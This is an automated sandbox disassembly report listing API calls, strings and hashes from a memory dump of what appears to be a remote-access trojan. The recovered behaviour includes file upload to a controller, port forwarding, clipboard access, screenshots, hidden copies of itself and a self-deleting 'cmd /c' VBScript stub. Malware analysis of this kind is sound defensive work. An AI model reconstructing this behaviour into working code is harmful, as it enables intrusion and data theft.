                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNEL32 ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32 ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32 ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                • API String ID: 1579085052-2309681474
                                • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32 ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32 ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable
                                • String ID:
                                • API String ID: 1464849758-0
                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                • API String ID: 1332880857-3714951968
                                • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                • API String ID: 3086580692-2582957567
                                • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                • API String ID: 489098229-1431523004
                                • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                • API String ID: 1913171305-3159800282
                                • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32 ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • API ID: Eventinet_ntoa
                                • String ID: (I)$GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-1198914978
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32 ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32 ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32 ref: 0041696C
                                • GlobalLock.KERNEL32 ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@
                                • API String ID: 2172192267-604454484
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                APIs
                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                APIs
